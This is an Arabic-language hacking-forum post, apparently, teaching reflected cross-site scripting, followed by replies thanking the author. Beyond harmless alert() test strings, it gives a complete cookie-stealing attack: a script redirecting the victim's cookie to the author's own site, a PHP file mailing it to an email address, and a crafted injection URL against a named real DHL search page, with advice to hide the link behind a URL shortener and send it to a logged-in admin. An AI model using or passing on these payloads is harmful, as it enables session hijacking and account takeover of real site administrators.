ثغرات الــــ Xss حصرياااا ...

بسم الله الرحمن الرحيم
^^^^^^^^^^^^^^^^^^^^^^^^^

cross site scripting
Xss

ان ثغرات Xss ليس من الصعب ان نعرف اذا كان( كذا ملف) او (كذا موقع) مصاب بها او لا .
ففي بعض المواقع نشوف فيه شريط للبحث

وعادة يكون هذا الشريط قابل للستغلال بواسطة ثعرات الXsS
Search
ففي اغلب الحالات يمكننا ان نستعلم عن وجود ثغرة Xss
في شريط البحث هذا عن طريق الكود التالي

 "><script>alert('sEc-RisK');</script> 

هذا الكود الي رح نكتبه بالبحث … ما راح يسوي شي غير انه رح

يضهر تنبيه بالمتصفح
مكتوب بيه كلمة sEc-RisK

اما اذا جربنا الكود التالي …

 "><script>alert(document.cookie);</script> 

فسوف يضهر لنا
الــ موسم او ال جلسة الكوكيز الخاص بنا (يعني اذا كنا داخلين ع الموقع logged in )

وليس فقط في شريط البحث نجد الثغرات وانما في الـــ URL
مثل ::

 http://remoteareas.dhl.com/jsp/Search.jsp?fromMain=true&DPEECTR=N&cntry_cd=

يعني اذا جربنا نضيف الكود الاول

"><script>alert('sEc-RisK');</script> 

بعد علامة الـــ يساوي =
ليصبح الرابط بهذا الشكل …

  http://remoteareas.dhl.com/jsp/Search.jsp?fromMain=true&DPEECTR=N&cntry_cd="><script>alert

('sEc-RisK');</script> 

رح نشوف انه يضهر لنا تحذير مكتوب بيه sEc-RisK

مممممم حلو طيب خلينا نجرب الكود الثاني الي يضهر لنا الكوكيز
لكي يصبح الرابط بهذا الشكل

 http://remoteareas.dhl.com/jsp/Search.jsp?fromMain=true&DPEECTR=N&cntry_cd=%22%3E%
 

3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

رح نشوف الكوكيز بتاعنا يضهر على شكل تنبيه !
حلووو طيب كل واحد عنده كوكيز خاص بيه واكيد المدير الخاص بالموقع عنده كوكيز لما يدخل بعضويته (ADMIN)

اذا لازم نعرف الكوكيز الخاص بالادمن…
وبعد ذلك نستعمل ما يسمى بــ (مختطف الكوكيز)…
مختطف الكوكيز :"عبارة عن كود او سكربت نرفعه على سيرفرنا او
اي استضافة مجانية ووضيفته يرسل لنا كوكيز الضحية…
اوكي الان لازم نسوي ملف ونسميه
مثلا

بداخل هذا الملف نصنع كود يضهر الكوكيز ويرسلها الى أميل معين…
cookiescript.js
أولا بالكود لازم نسوي تحويل الى موقعنا الي رح نرفع عليه الملفات
ومتغير الكوكيز …
يعني محتويات

رح تكون

 <script>location.href="http://sec-risk.com/cookie.php?cookie=</script>

ونعمل ملف ثاني اسمه

cookiescript.js cookie.php
ومحتوياته

 <? mail("pent3st@yahoo.com","This is the admin Cookie",$_GET['cookie']; ?>

ونحفضه
الان نرفع

و

الى سيرفرنا او اي استضافة
cookie.php cookiescript.js
وبعد رفع الملفات نذهب الى الموقع المصاب ونعمل Include لـ
لــ

ليصبح الرابط …
cookiescript.js

 http://remoteareas.dhl.com/jsp/Search.jsp?fromMain=true&DPEECTR=N&cntry_cd="><script 

src="http://www.sec-risk.com/cookiescript.js"></script>

الان نرسل الرابط الاخير الى الضحية (الادمن)…
على شرط ان يكون Already logged in بعضويته
بس نستعمل توهيم للرابط حتى ما يشك الضحية …
في هذا الموقع
http://tinyurl.com

واذا فتح الرابط ونجحت العملية سوف تصلك رسالة الى اميلك الي خليته بالكود
فيها كوكيز المدير ومبروك عليك …

الشرح … بواسطة RisKy
وحصريا على sEc-RisK.cOm

الي يحب ينقل بس يذكر الحقوق …

تسلم ايدك ياغالي علىشرح

ولو عملت شرح فيديو ياغالي كان حسن بكتررررر

متل ما قالي اخي فارررس

اهلا… انشاء الله قريبا دروس فديو …

شرح من الآخر
تسلم ايدك يا حج

منور حج فارس ddd

في المركز الصحيح

بدون لف ولا دوران ولا تدويخ

الله عليك إستمر :slight_smile:

تسلم ايدك ياغالي علىشرح

منوررين …

مشكور حبيبي رسكي

تسلم ياحج موضوع جميل جدا